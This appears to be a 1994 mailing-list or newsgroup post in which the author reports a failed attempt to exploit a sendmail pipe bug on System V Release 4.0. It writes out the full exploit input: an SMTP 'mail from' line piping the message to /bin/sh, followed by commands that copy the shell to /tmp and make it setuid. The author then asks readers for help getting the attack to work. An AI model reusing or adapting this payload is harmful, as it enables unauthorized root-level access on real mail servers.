We have sendmail 5.0 installed on System V Release 4.0.
I tried to exploit the sendmail bug but no luck. I tried :
mail from: |/bin/tail|/bin/sh
rcpt to: fred (thats me)
Subject: Checking our mail for vulnerabilities
echo This is a test > /tmp/b1
echo id is: >> /tmp/b1
/bin/id >> /tmp/b1
echo *****KRAD****** >> /tmp/b1
cp /bin/sh /tmp/afil3
chmod u+s /tmp/afil3
echo /tmp/afil3 contains a krad file >> /tmp/b1
chmod ugo+rx /tmp/afil3
Now what happens is that I get the message returned to me with:
From |/bin/tail|/bin/sh Tue Nov 15 18:18 GMT 1994
Date: Tue, 15 Nov 1994 18:14:00 +0000
as the header... why have I got it back? I think the mail program should
have executed the program I put.. so why didn't it create the shell?
Any Input would be greatly apprectiated... e-mail your response if you know
how to get it working... thanks.